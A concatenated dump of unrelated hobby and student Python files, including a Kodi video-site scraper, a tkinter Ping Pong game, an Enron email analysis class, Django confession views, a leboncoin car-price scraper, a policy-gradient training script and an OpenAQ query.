peliculas(item):\n logger.info(\"streamondemand.italiaserie peliculas\")\n itemlist = []\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n\n # Estrae i contenuti \n patron = '
\\s*\\s*]+>'\n matches = re.compile(patron, re.DOTALL).findall(data)\n\n for scrapedurl, scrapedtitle, scrapedthumbnail in matches:\n scrapedplot = \"\"\n scrapedtitle = scrapertools.decodeHtmlentities(scrapedtitle)\n scrapedurl = scrapedurl.replace(\"-1/\", \"-links/\")\n\n itemlist.append(infoSod(\n Item(channel=__channel__,\n action=\"episodios\",\n fulltitle=scrapedtitle,\n show=scrapedtitle,\n title=\"[COLOR azure]\" + scrapedtitle + \"[/COLOR]\",\n url=scrapedurl,\n thumbnail=scrapedthumbnail,\n plot=scrapedplot,\n folder=True), tipo='tv'))\n\n # Paginazione \n patronvideos = ''\n matches = re.compile(patronvideos, re.DOTALL).findall(data)\n\n if len(matches) > 0:\n scrapedurl = urlparse.urljoin(item.url, matches[0])\n itemlist.append(\n Item(channel=__channel__,\n action=\"HomePage\",\n title=\"[COLOR yellow]Torna Home[/COLOR]\",\n folder=True)),\n itemlist.append(\n Item(channel=__channel__,\n action=\"peliculas\",\n title=\"[COLOR orange]Successivo >>[/COLOR]\",\n url=scrapedurl,\n thumbnail=\"http://2.bp.blogspot.com/-fE9tzwmjaeQ/UcM2apxDtjI/AAAAAAAAeeg/WKSGM2TADLM/s1600/pager+old.png\",\n folder=True))\n\n return itemlist\n\n\ndef HomePage(item):\n import xbmc\n xbmc.executebuiltin(\"ReplaceWindow(10024,plugin://plugin.video.streamondemand)\")\n\n\ndef search(item, texto):\n logger.info(\"[italiaserie.py] \" + item.url + \" search \" + texto)\n item.url = host + \"/?s=\" + texto\n try:\n return peliculas(item)\n # Continua la ricerca in caso di errore \n except:\n import sys\n for line in sys.exc_info():\n logger.error(\"%s\" % line)\n return []\n\n\ndef episodios(item):\n def load_episodios(html, item, itemlist, lang_title):\n patron = '((?:.*?]+>[^<][^<]+<(?:b|\\/)[^>]+>)+)'\n matches = re.compile(patron).findall(html)\n for data in matches:\n # Estrazione\n scrapedtitle = data.split(']*>', '', scrapedtitle).strip()\n if scrapedtitle != 'Categorie':\n scrapedtitle = scrapedtitle.replace('×', 'x')\n scrapedtitle = scrapedtitle.replace('×', 'x')\n itemlist.append(\n Item(channel=__channel__,\n action=\"findvideos\",\n contentType=\"episode\",\n title=\"[COLOR azure]%s[/COLOR]\" % (scrapedtitle + \" (\" + lang_title + \")\"),\n url=data,\n thumbnail=item.thumbnail,\n extra=item.extra,\n fulltitle=scrapedtitle + \" (\" + lang_title + \")\" + ' - ' + item.show,\n show=item.show))\n\n logger.info(\"[italiaserie.py] episodios\")\n\n itemlist = []\n\n # Download pagina\n data = httptools.downloadpage(item.url).data\n data = scrapertools.decodeHtmlentities(data)\n if 'CLICCA QUI PER GUARDARE TUTTI GLI EPISODI' in data:\n item.url = re.sub('\\-\\d+', '-links', item.url)\n data = httptools.downloadpage(item.url).data\n data = scrapertools.decodeHtmlentities(data)\n data = scrapertools.get_match(data, '
(.*?)')\n\n lang_titles = []\n starts = []\n patron = r\"Stagione.*?ITA\"\n matches = re.compile(patron, re.IGNORECASE).finditer(data)\n for match in matches:\n season_title = match.group()\n if season_title != '':\n lang_titles.append('SUB ITA' if 'SUB' in season_title.upper() else 'ITA')\n starts.append(match.end())\n\n i = 1\n len_lang_titles = len(lang_titles)\n\n while i <= len_lang_titles:\n inizio = starts[i - 1]\n fine = starts[i] if i < len_lang_titles else -1\n\n html = data[inizio:fine]\n lang_title = lang_titles[i - 1]\n\n load_episodios(html, item, itemlist, lang_title)\n\n i += 1\n\n if config.get_library_support() and len(itemlist) != 0:\n itemlist.append(\n Item(channel=__channel__,\n title=\"Aggiungi alla libreria\",\n url=item.url,\n action=\"add_serie_to_library\",\n extra=\"episodios\",\n show=item.show))\n\n return itemlist\n\n\ndef findvideos(item):\n logger.info(\"streamondemand.italiaserie findvideos\")\n\n # Carica la pagina \n data = item.url\n\n itemlist = servertools.find_video_items(data=data)\n\n for videoitem in itemlist:\n videoitem.title = item.title + videoitem.title\n videoitem.fulltitle = item.fulltitle\n videoitem.thumbnail = item.thumbnail\n videoitem.show = item.show\n videoitem.plot = item.plot\n videoitem.channel = __channel__\n\n return itemlist\n\ndef findepvideos(item):\n logger.info(\"streamondemand.italiaserie findepvideos\")\n\n # Carica la pagina \n data = httptools.downloadpage(item.url).data\n \n if 'CLICCA QUI PER GUARDARE TUTTI GLI EPISODI' in data:\n item.url = re.sub('\\-\\d+', '-links', item.url)\n data = httptools.downloadpage(item.url).data\n data = scrapertools.decodeHtmlentities(data)\n\n data = scrapertools.find_single_match(data, item.extra)\n itemlist = servertools.find_video_items(data=data)\n\n for videoitem in itemlist:\n server = re.sub(r'[-\\[\\]\\s]+', '', videoitem.title)\n videoitem.title = \"\".join([\"[%s] \" % (\"[COLOR orange]\" + server.capitalize() + \"[/COLOR]\"), item.title])\n videoitem.fulltitle = item.fulltitle\n videoitem.show = item.show\n videoitem.thumbnail = item.thumbnail\n videoitem.channel = __channel__\n\n return itemlist\n","repo_name":"kodirepositoryluxy/KM17_15.01.18-2","sub_path":"addons/temp/7f2aab45-9907-4492-8741-fac27e7e9ac8/channels/italiaserie.py","file_name":"italiaserie.py","file_ext":"py","file_size_in_byte":10637,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"74810785706","text":"'''\r\nAutor: Kilian Mayerhofer-Bollek\r\nDatum 21.7.2021\r\nEin einfaches Spiel mit tkinter\r\n'''\r\nimport tkinter as tk\r\nimport random\r\n\r\n\r\n\r\n\r\nclass Ball:\r\n def __init__(self,spielfeld,schleager):\r\n self.spielfeld = spielfeld\r\n self.schleager = schleager\r\n self.form=spielfeld.create_oval(10,10,40,40,fill='green')\r\n self.xges=random.uniform(0,0.1)\r\n self.yges=-0.1\r\n self.hit_bottom =False\r\n\r\n\r\n def abprallen(self):\r\n self.spielfeld.move(self.form,self.xges,self.yges)\r\n position=self.spielfeld.coords(self.form)\r\n if position[1]<=0:\r\n self.yges=0.1\r\n if position[3]>=400:\r\n self.hit_bottom=True\r\n if position[0]<= 0:\r\n self.xges=0.1\r\n if position[2]>=500:\r\n self.xges=-0.1\r\n if self.hit_paddle(position) == True:\r\n self.yges = -0.1\r\n self.xges = random.uniform(-1,1)\r\n\r\n\r\n def hit_paddle(self, pos):\r\n paddle_pos = self.spielfeld.coords(self.schleager.form)\r\n if pos[2] >= paddle_pos[0] and pos[0] <= paddle_pos[2]:\r\n if pos[3] >= paddle_pos[1] and pos[3] <= paddle_pos[3]:\r\n return 
True\r\n return False\r\n\r\n\r\nclass Schlaeger:\r\n def __init__(self,spielfeld):\r\n self.spielfeld=spielfeld\r\n self.form=spielfeld.create_rectangle(0,0,120,10,fill='black')\r\n self.spielfeld.move(self.form,200,350)\r\n self.spielfeld.bind_all('a',self.links)\r\n self.spielfeld.bind_all('d',self.rechts)\r\n self.xges=0\r\n\r\n def hinher(self):\r\n self.spielfeld.move(self.form, self.xges, 0)\r\n pos= self.spielfeld.coords(self.form)\r\n if pos[0]<= 0:\r\n self.xges=0\r\n if pos [2]>=500:\r\n self.xges=0\r\n\r\n def links(self,event):\r\n self.xges=-0.1\r\n self.yges=0\r\n\r\n def rechts(self,event):\r\n self.xges=0.1\r\n self.yges=0\r\n\r\n\r\nfenster =tk.Tk()\r\nfenster.title('Ping Pong')\r\nspielfeld=tk.Canvas(fenster, width=500, height=400, bd=0, bg ='royalblue')\r\nspielfeld.pack()\r\nSchlaeger=Schlaeger(spielfeld)\r\nBall=Ball(spielfeld,Schlaeger)\r\nwhile Ball.hit_bottom == False:\r\n Schlaeger.hinher()\r\n Ball.abprallen()\r\n fenster.update_idletasks()\r\n fenster.update()\r\n\r\nfenster.mainloop()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"Chia-vie/CodeRoemerland","sub_path":"Abgaben/Ping Pong_Kilian.py","file_name":"Ping Pong_Kilian.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11520318557","text":"import os\nimport numpy as np\n\n'''\nfilepath = '/data/bf312/3D-Billiard/training/'\nfilename= os.listdir(filepath)\n\nglobal_count = 0\nfor name in filename:\n new_name = str(global_count) # + '_test'\n os.rename(filepath + name, filepath + new_name)\n global_count += 1\n\nfor name in filename:\n data_name = os.listdir(filepath + name + '/')\n # print(len(data_name))\n if len(data_name) != 100:\n print(name)\n'''\n\n# 1_hinton, hinton\n\n'''\nfilepath = '/data/bf312/3D-Billiard/validation/generated_test_images_bengio/'\nfor i in range(0, 100):\n new_name = i + 100\n os.rename(filepath + str(i), filepath + str(new_name))\n'''\n\n\nfilepath = '/data/bf312/3D-Billiard/testing/'\nhinton_1_data_bbox = np.load(filepath + 'generated_test_images_1_hinton/bbox.npy')\nhinton_1_data_pres = np.load(filepath + 'generated_test_images_1_hinton/pres.npy')\nprint(hinton_1_data_bbox.shape, hinton_1_data_pres.shape)\nhinton_data_bbox = np.load(filepath + 'generated_test_images_hinton/bbox.npy')\nhinton_data_pres = np.load(filepath + 'generated_test_images_hinton/pres.npy')\nprint(hinton_data_bbox.shape, hinton_data_pres.shape)\n\n\nbbox = np.concatenate((hinton_1_data_bbox, hinton_data_bbox), axis=0)\nprint(bbox.shape)\npres = np.concatenate((hinton_1_data_pres, hinton_data_pres), axis=0)\nprint(pres.shape)\n\nnp.save('/data/bf312/3D-Billiard/testing/bbox.npy', bbox)\nnp.save('/data/bf312/3D-Billiard/testing/pres.npy', pres)\n","repo_name":"NanboLi/CLEVR-Object-Centric","sub_path":"dynamic_scene_generator/utils/make_dataset.py","file_name":"make_dataset.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"72214866028","text":"import os, sys, email, re\nimport pandas as pd\n# plotting\nimport matplotlib.pyplot as plt\n# %matplotlib inline\nimport seaborn as sns\nsns.set_style(\"whitegrid\")\nimport wordcloud\n# Network Analysis\nimport networkx as nx\n\n# NLP\nfrom nltk.tokenize.regexp import RegexpTokenizer\nfrom sklearn.feature_extraction.stop_words import ENGLISH_STOP_WORDS\n\nfrom subprocess import check_output\n\n\nclass analyse_enron:\n\n # (Analyzing 1000 emails first 
due to lack of memory)\n def __init__(self, size=None):\n self.size = size\n self.email_df = pd.read_csv('input/emails.csv', nrows=self.size)\n messages = list(map(email.message_from_string, self.email_df['message']))\n self.email_df.drop('message', axis=1, inplace=True)\n # Get fields from parsed email fields\n keys = messages[0].keys()\n\n for key in keys:\n self.email_df[key] = [doc[key] for doc in messages]\n # Parse content from emails\n self.email_df['content'] = list(map(self.get_text_from_email, messages))\n # split multiple email addresses\n self.email_df['From'] = self.email_df['From'].map(self.split_email_addresses)\n self.email_df['To'] = self.email_df['To'].map(self.split_email_addresses)\n\n # Extract the root of file as user\n self.email_df['user'] = self.email_df['file'].map(lambda x:x.split('/')[0])\n\n del messages\n\n def view_file_detail(self):\n\n # print(check_output(['ls', 'input/']).decode(\"utf8\"))\n # Read data into dataframe\n file_input = check_output(['ls', 'input/'].decode('utf8'))\n shape_of_emails = self.email_df.shape\n return file_input, shape_of_emails\n\n # get the names/ emails of all the workers\n def get_workers_detail(self):\n # self.parsing_mails()\n self.__init__()\n workers_names = set()\n workers_emails = set()\n for i in range(self.size):\n workers_names.add(self.email_df['X-From'][i])\n workers_emails.add(next(iter(self.email_df['From'][i])))\n workers_names = list(workers_names)\n workers_emails = list(workers_emails)\n return workers_names, workers_emails\n\n # search for emails sent by a worker in enron by just typing part of his/her name\n def get_individual_email(self, name='phillip'):\n # self.parsing_mails()\n self.__init__()\n name = name.lower()\n subjects = []\n contents = []\n for i in range(self.size):\n full_sender_name = (self.email_df['X-From'][i]).lower()\n matcher = re.search(r'\\b{}\\b'.format(name), full_sender_name)\n # print(full_sender_name)\n if matcher:\n subjects.append(self.email_df['Subject'][i])\n contents.append(self.email_df['content'][i])\n # print(self.email_df['Subject'][i])\n\n return subjects, contents\n\n # search for keywords in emails sent by particular workers for more info.\n def search_individual_email(self, name='phillip', key_word='forecast'):\n target_contents = []\n key_word = key_word.lower()\n _, contents = self.get_individual_email(name=name)\n\n # if there are really contents in the lists, then go ahead and work\n if len(contents) != 0:\n\n for content in contents:\n full_content = str(content).lower()\n key_word_matcher = re.search(r'\\b{}\\b'.format(key_word), full_content)\n if key_word_matcher:\n target_contents.append(content)\n\n return target_contents\n\n # def view_sample_mails(self, sample_id = 25):\n # self.__init__()\n # single_sample = self.email_df['message'][sample_id]\n # msg = email.message_from_string(single_sample)\n # variation = self.email_df['Subject'][sample_id]\n # # get only the content of the email\n # for part in msg.walk():\n # if part.get_content_type() == 'text/plain':\n # msg = part.get_payload()\n # return single_sample, msg, variation\n\n def get_text_from_email(self, msg):\n parts = []\n for part in msg.walk():\n if part.get_content_type() == 'text/plain':\n parts.append(part.get_payload())\n return ''.join(parts)\n\n\n def split_email_addresses(self, line):\n # separate multiple email addresses\n if line:\n addrs = line.split(',')\n addrs = frozenset(map(lambda x:x.strip(), addrs))\n else:\n addrs = None\n return addrs\n\n # successful parsing message contents 
and fields and demo show only the first five\n def view_parsed_mails(self,):\n # self.parsing_mails()\n self.__init__()\n parsed = self.email_df.head()\n return parsed\n\n def view_dataframe_shape(self,):\n # print('shape of dataframe: ', email_df.shape)\n # self.parsing_mails()\n self.__init__()\n for col in self.email_df.columns:\n output = col, self.email_df[col].nunique()\n # print(col, email_df[col].nunique())\n return output\n\n # Set index and drop columns with two few values\n def set_and_drop(self):\n # self.parsing_mails()\n self.__init__()\n self.email_df = self.email_df.set_index('Message-ID').drop(['file', 'Mime-Version', 'Content-Type',\n 'Content-Transfer-Encoding'], axis=1)\n return self.email_df\n\n def parse_time(self):\n self.email_df = self.set_and_drop()\n # Parse datetime\n self.email_df['Date'] = pd.to_datetime(self.email_df['Date'], infer_datetime_format=True)\n return self.email_df.dtypes\n # print(email_df.dtypes)\n\n def plot_and_view_timestamps(self):\n self.parse_time()\n # Find out when emails were sent as a plot (Years)\n ax = self.email_df.groupby(self.email_df['Date'].dt.year)['content'].count().plot()\n ax.set_xlabel('Year', fontsize=18)\n ax.set_ylabel('N emails', fontsize=18)\n plt.show()\n\n # Find out when emails were sent as a plot (Days of the week)\n ax = self.email_df.groupby(self.email_df['Date'].dt.dayofweek)['content'].count().plot()\n ax.set_xlabel('Day of week', fontsize=18)\n ax.set_ylabel('N emails', fontsize=18)\n plt.show()\n\n # Find out when emails were sent as a plot (Hours of the day)\n ax = self.email_df.groupby(self.email_df['Date'].dt.hour)['content'].count().plot()\n ax.set_xlabel('Hour', fontsize=18)\n ax.set_ylabel('N emails', fontsize=18)\n plt.show()\n\n # find out who sent the most of mails\n def subject_and_content_count(self):\n self.set_and_drop()\n # count the word in the subject and content\n tokenizer = RegexpTokenizer(r'(?u)\\b\\w\\w+\\b')\n self.email_df['subject_wc'] = self.email_df['Subject'].map(lambda x:len(tokenizer.tokenize(x)))\n self.email_df['content_wc'] = self.email_df['content'].map(lambda x:len(tokenizer.tokenize(x)))\n\n group_by_people = self.email_df.groupby('user').agg({\n 'content': 'count',\n 'subject_wc': 'mean',\n 'content_wc':'mean'\n })\n\n group_by_people.rename(columns={'content': 'N emails',\n 'subject_wc': 'Subject word count',\n 'content_wc': 'Content word count'}, inplace=True)\n\n # print(group_by_people.sort('N emails', ascending=False).head())\n return group_by_people.sort_values(by='N emails', ascending=False).head()\n\n def sns_plot(self):\n sns.pairplot(self.subject_and_content_count().reset_index(), hue='user')\n # sns.pairplot(group_by_people.reset_index(), hue='user')\n plt.show()\n\n # who sent the most emails to whom\n def email_sent_data(self):\n self.set_and_drop()\n # checking emails sent to single email addresses first, more important stuffs\n sub_df = self.email_df[['From', 'To', 'Date']].dropna()\n # print(sub_df.shape)\n\n # drop emails sent to multiple email addresses [because it might mostly contain\n # unwanted information]\n sub_df = sub_df.loc[sub_df['To'].map(len) == 1]\n # print(sub_df.shape)\n\n # actually view who sent what to who\n sub_df = sub_df.groupby(['From', 'To']).count().reset_index()\n # Unpack frozensets\n sub_df['From'] = sub_df['From'].map(lambda x: next(iter(x)))\n sub_df['To'] = sub_df['To'].map(lambda x: next(iter(x)))\n\n # rename column and print the first 10 of such email sendings\n sub_df.rename(columns={'Date': 'count'}, inplace=True)\n # 
print(sub_df.sort_values(by='count', ascending=False).head(10))\n return sub_df.sort_values(by='count', ascending=False).head(10), sub_df\n\n # this method enables one to know the number of emails sent by the id entered and to whom\n def tracker(self, personnel_name = None):\n processed_above = list(self.email_sent_data())\n target_contents = []\n for item in processed_above:\n full_content = str(item).lower()\n key_word_matcher = re.search(r'\\b{}\\b'.format(personnel_name), full_content)\n if key_word_matcher:\n target_contents.append(item)\n return target_contents\n\n # make a network of email senders and recipients\n def network(self):\n _, sub_df = self.email_sent_data()\n G = nx.from_pandas_dataframe(sub_df, 'From', 'To', edge_attr='count', create_using=nx.DiGraph())\n # print('Number of nodes: %d, Number of edges: %d' % (G.number_of_nodes(), G.number_of_edges()))\n return 'Number of nodes: %d, Number of edges: %d' % (G.number_of_nodes(), G.number_of_edges())\n\n def word_clouding(self):\n self.set_and_drop()\n # What the emails say in subject\n subjects = ' '.join(self.email_df['Subject'])\n fig, ax = plt.subplots(figsize=(16, 12))\n wc = wordcloud.WordCloud(width=800,\n height=600,\n max_words=200,\n stopwords=ENGLISH_STOP_WORDS).generate(subjects)\n ax.imshow(wc)\n ax.axis(\"off\")\n\n # What the emails say in content\n contents = ' '.join(self.email_df.sample(1000)['content'])\n fig, ax = plt.subplots(figsize=(16, 12))\n wc = wordcloud.WordCloud(width=800,\n height=600,\n max_words=200,\n stopwords=ENGLISH_STOP_WORDS).generate(contents)\n ax.imshow(wc)\n ax.axis(\"off\")\n\n plt.show()\n\n# testing\n\nae = analyse_enron(size=5000)\n\ntarget_contents = ae.search_individual_email(name='phillip', key_word='forecast')\ngroupee =ae.subject_and_content_count()\nif len(target_contents) == 0:\n print('No keyword matched')\nelse:\n print(ae.tracker(personnel_name='phillip'))\n\n# me, you, us = ae.view_sample_mails(sample_id=23)\n# print(you)\n\n","repo_name":"bluedistro/enron_email_analysis","sub_path":"enron_1.py","file_name":"enron_1.py","file_ext":"py","file_size_in_byte":11042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19972532652","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import Confession\nfrom django.contrib.auth.models import User\n#import HttpResponseRedirect\nfrom django.http import HttpResponseRedirect\nfrom django.contrib import messages\n# Create your views here.\ndef index(request):\n if request.user.is_authenticated:\n return redirect('profile')\n else:\n return render(request, 'app/index.html')\ndef addConfession(request, username):\n if User.objects.filter(username=username):\n print('user exists')\n if request.method == 'POST':\n user = User.objects.get(username=username)\n\n confession = request.POST['confession']\n user = user\n Confession.objects.create(confession=confession, user=user)\n return HttpResponseRedirect(request.path_info)\n messages.success(request, 'Confession sent!')\n context= {\n 'user': user\n }\n return render(request, 'app/addConfession.html', {'username': username})\n else:\n return render(request, 'app/dont.html', {'username': username})\n@login_required\ndef profile(request):\n user = request.user\n confessions = user.confessions.all().order_by('-date')\n context = {\n 'user': user,\n 'confessions': confessions\n }\n \n return render(request, 'app/profile.html', 
context)\n\n","repo_name":"samyogkhatiwada/says","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21386827148","text":"\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import rc\n\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\nimport json # json.loads\n\n# --------------------------------------ENONCE ---------------------------\n# L'objectif est de générer un fichier de données sur le prix des Renault Zoé sur le marché de l'occasion\n# en Ile de France, PACA et Aquitaine.\n# Vous utiliserezleboncoin.fr comme source. Le fichier doit être propre et contenir les infos suivantes :\n# version ( il y en a 3), année, kilométrage, prix, téléphone du propriétaire, est ce que la voiture est vendue par un professionnel ou un particulier.\n# Vous ajouterez une colonne sur le prix de l'Argus du modèle que vous\n# récupérez sur ce site\n# http://www.lacentrale.fr/cote-voitures-renault-zoe--2013-.html.\n\n# Les données quanti (prix, km notamment) devront être manipulables (pas de string, pas d'unité).\n# Vous ajouterez une colonne si la voiture est plus chere ou moins chere\n# que sa cote moyenne.\n\n# ----------------------------------- APPROCHE --------------------------\n# 1) Récupération des numéros d'annonce ou adresses de pages web à aller chercher\n# https://www.leboncoin.fr/voitures/offres/ile_de_france/?th=1&q=zoe&parrot=0\n# https://www.leboncoin.fr/voitures/offres/provence_alpes_cote_d_azur/?th=1&q=zoe&parrot=0\n# https://www.leboncoin.fr/voitures/offres/aquitaine/?th=1&q=zoe&parrot=0\n\n# 2) Récupération des infos plus détaillées par annonce, sur des pages de type\n# https://www.leboncoin.fr/voitures/1035061272.htm?ca=12_s\n\n# 3) Récupération des infos sur la Centrale en deux temps... 
une première\n# requête donnant les différents modèles diponibles, sélection de la\n# première ligne présentée pour ouvrir page et collecter cote\n\n\n# Récupération des annonces - 3 requêtes correspondant aux 3 régions demandées\nliste_regions = {'IDF': 'ile_de_france',\n 'PACA': 'provence_alpes_cote_d_azur', 'AQU': 'aquitaine'}\nmodele = 'zoe'\nmarque = 'Renault'# majuscule puis minuscule\nversions = ['Zen','Intens','Life']\n\n# modele = 'Q5'\n# marque = 'Audi'# majuscule puis minuscule\n# versions = ['Sline','quattro','Luxe']\n\n\n\n\nliste_annonces = []\nliste_region_annonces = []\nliste_type_vendeur = []\n\nparam1 = {'th':1,'parrot':0,'brd':marque,'q':modele.lower()}\nfor region in liste_regions:\n # adresse_page = u'https://www.leboncoin.fr/voitures/offres/' + \\\n # liste_regions[region] + '/?th=1&parrot=0&fu=4&brd=' + marque + '&q=' + modele.lower()\n # whole_page = requests.get(adresse_page)\n adresse_page = u'https://www.leboncoin.fr/voitures/offres/' + liste_regions[region]\n whole_page = requests.get(adresse_page, params=param1)\n soup_page = BeautifulSoup(whole_page.text, 'html.parser')\n rows = soup_page.find_all(class_=\"list_item clearfix trackable\")\n\n for row in rows:\n info_glob = row.unwrap()\n liste_annonces.append(info_glob['href'])\n liste_region_annonces.append(region)\n # Récup type vendeur\n data_info = info_glob['data-info']\n pos_info = data_info.rfind('ad_offres')\n type_vendeur = \"\"\n if (pos_info > 0):\n type_vendeur = data_info[pos_info +\n 14:pos_info + 18].replace('\"', '')\n liste_type_vendeur.append(type_vendeur)\n\ndf = pd.DataFrame({'Region': liste_region_annonces, 'Site': liste_annonces, 'Type_Vendeur': liste_type_vendeur,\n 'prix': 0, 'annee': 0, 'kms': 0, 'marque': \"\", 'version': \"\", 'tel': \"\", 'Argus': 0})\n \nnum_tel = re.compile(\n \"(\\+33|0)(\\s||0|\\-)[0-9](\\.|\\s||)([0-9]{2}(\\.|\\s||\\-)){3}[0-9]{2}\")\nfor row in range(0, df.count()[0]):\n adresse_page = \"https:\" + df['Site'].ix[row]\n whole_page = requests.get(adresse_page)\n soup_page = BeautifulSoup(whole_page.text, 'html.parser')\n temp = soup_page.find(class_=\"item_price clearfix\").find(class_=\"value\")\n if temp != None:\n df['prix'].ix[row] = int(re.sub(\"[^0-9]\", \"\", temp.text))\n temp = soup_page.find(class_=\"value\", itemprop=\"brand\")\n if temp != None:\n df['marque'].ix[row] = temp.text\n temp = soup_page.find(class_=\"value\", itemprop=\"releaseDate\")\n if temp != None:\n df['annee'].ix[row] = int(re.sub(\"[^0-9]\", \"\", temp.text))\n temp = soup_page.find(\n class_=\"value\", itemprop=\"releaseDate\").parent.parent.nextSibling.nextSibling.find(class_=\"value\")\n if temp != None:\n df['kms'].ix[row] = int(re.sub(\"[^0-9]\", \"\", temp.text))\n \n temp = soup_page.find(class_=\"adview_header clearfix\").find(\n class_=\"no-border\")\n temp_version = re.sub(\"[^A-Za-z]\", \"\", temp.text).upper()\n version = \"\"\n for version_testee in versions:\n if re.search(version_testee.upper(), temp_version):\n version = version_testee \n df['version'].ix[row] = version\n\n # Chercher numéro de téléphone dans annonce...\n description = soup_page.find(class_=\"value\", itemprop=\"description\").text\n tel_description = re.search(num_tel, description)\n if tel_description != None:\n num_tel_brut = tel_description.string[\n tel_description.span()[0]:tel_description.span()[1]]\n num_tel_propre = re.sub('([^0-9+])', '', num_tel_brut)\n df['tel'].ix[row] = num_tel_propre\n\n# df.to_excel(\"Annonces \" + modele + \".xls\")\n# df = pd.read_excel(\"Annonces \" + modele + 
\".xls\")\n\n# Collecte infos La Centrale\n# http://www.lacentrale.fr/cote-voitures-renault-zoe--2015-.html\n# http://www.lacentrale.fr/cote-auto-renault-zoe-intens-2015.html\ndf1 = df.dropna(subset=['version']).reset_index()\nfor row in range(0, df1.count()[0]):\n if df1.version.ix[row] != \"\":\n adresse_page = 'http://www.lacentrale.fr/cote-voitures-' + \\\n df1.marque.ix[row].lower() + '-' + modele + '-' + df1.version.ix[row].lower() + \\\n '-' + str(df1.annee.ix[row]) + '-.html'\n whole_page = requests.get(adresse_page)\n soup_page = BeautifulSoup(whole_page.text, 'html.parser')\n premiere_ligne = soup_page.find(class_=\"listingResultLine f14 auto\")\n if premiere_ligne != None:\n adresse_page = 'http://www.lacentrale.fr/' + premiere_ligne.findChild()['href']\n whole_page = requests.get(adresse_page)\n soup_page = BeautifulSoup(whole_page.text, 'html.parser')\n temp = soup_page.find(class_=\"f24 bGrey9L txtRed pL15 mL15\")\n if temp != None:\n cote = int(re.sub('[^0-9]', \"\", temp.text))\n df1.Argus.ix[row] = cote\n\ndf1.to_excel(\"Annonces \" + modele + \".xls\")\n","repo_name":"SkatiRCI/starter-kit-datascience","sub_path":"franck-bautista/Lesson4/exo_dom_lesson_4_Leboncoin.py","file_name":"exo_dom_lesson_4_Leboncoin.py","file_ext":"py","file_size_in_byte":6583,"program_lang":"python","lang":"fr","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"72192187307","text":"import argparse\n\nimport numpy as np\nimport gym\nimport torch\n\nfrom agent import VanillaPG\nfrom agent import OffPolicyPG\n\n\ndef off_policy_run(env, args):\n agent = OffPolicyPG(env, args)\n global_steps = 0\n for ep in range(args.num_ep):\n rollouts, ep_steps, ep_rewards = run_episode(env, agent)\n global_steps += ep_steps\n agent.train(rollouts)\n ep_avg_rewards = np.mean(ep_rewards)\n print(\"Ep %d reward: %.4f ep_steps: %d global_steps: %d\" % \n (ep, ep_avg_rewards, ep_steps, global_steps))\n\n\ndef on_policy_run(env, args):\n agent = VanillaPG(env, args)\n global_steps = 0\n for ep in range(args.num_ep):\n rollouts, ep_steps, ep_rewards = run_episode(env, agent)\n global_steps += ep_steps\n agent.train(rollouts)\n ep_avg_rewards = np.mean(ep_rewards)\n print(\"Ep %d reward: %.4f ep_steps: %d global_steps: %d\" % \n (ep, ep_avg_rewards, ep_steps, global_steps))\n\n\ndef on_policy_run(env, args):\n agent = VanillaPG(env, args)\n global_steps = 0\n for ep in range(args.num_ep):\n rollouts, ep_steps, ep_rewards = run_episode(env, agent)\n global_steps += ep_steps\n agent.train(rollouts)\n ep_avg_rewards = np.mean(ep_rewards)\n print(\"Ep %d reward: %.4f ep_steps: %d global_steps: %d\" % \n (ep, ep_avg_rewards, ep_steps, global_steps))\n\n\ndef main(args):\n # device\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\") \n args.device = device\n # seed\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n # env and agent\n task_name = \"BipedalWalker-v2\"\n env = gym.make(task_name)\n env.seed(args.seed)\n # run\n # on_policy_run(env, args)\n off_policy_run(env, args)\n\n\ndef run_episode(env, agent):\n obs = env.reset()\n obs = preprocess(obs)\n ep_rewards, rollouts = [], []\n ep_steps = 0\n while True:\n logp, action = agent.step(obs)\n next_obs, reward, done, _ = env.step(action)\n ep_rewards.append(reward)\n next_obs = preprocess(next_obs)\n rollouts.append([obs, action, reward, logp, next_obs])\n obs = next_obs\n ep_steps += 1\n if done:\n break\n return rollouts, ep_steps, ep_rewards\n\n\ndef preprocess(obs):\n return obs.astype(np.float32)\n\n\nif __name__ == 
'__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--num_ep\", type=int, default=5000)\n parser.add_argument(\"--lr\", type=float, default=1e-2)\n parser.add_argument(\"--seed\", type=int, default=31)\n parser.add_argument(\"--gpu\", action=\"store_true\")\n main(parser.parse_args())\n","repo_name":"borgwang/reinforce_py","sub_path":"algorithms/PG/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2652,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"37"} +{"seq_id":"39889020901","text":"import json\nimport requests\n\n# api_url = f\"https://api.openaq.org/v2/measurements?date_from=2000-01-01T00%3A00%3A00%2B00%3A00&date_to=2022-09-29T15%3A10%3A00%2B00%3A00&limit=100&page=1&offset=0&sort=desc¶meter_id=2¶meter=&radius=1000&location_id={}&order_by=datetime\"\n\nwith open('location_id.json', 'r') as location_id_file:\n location_ids = json.load(location_id_file)\n\nlocation_datapoints = {}\n\nfor location, id in location_ids.items():\n api_url = f\"https://api.openaq.org/v2/measurements?date_from=2000-01-01T00%3A00%3A00%2B00%3A00&date_to=2022-09-29T15%3A10%3A00%2B00%3A00&limit=100&page=1&offset=0&sort=desc¶meter_id=2&radius=100&location_id={id}&order_by=datetime\"\n response = requests.get(api_url)\n\n response_json = response.json()\n 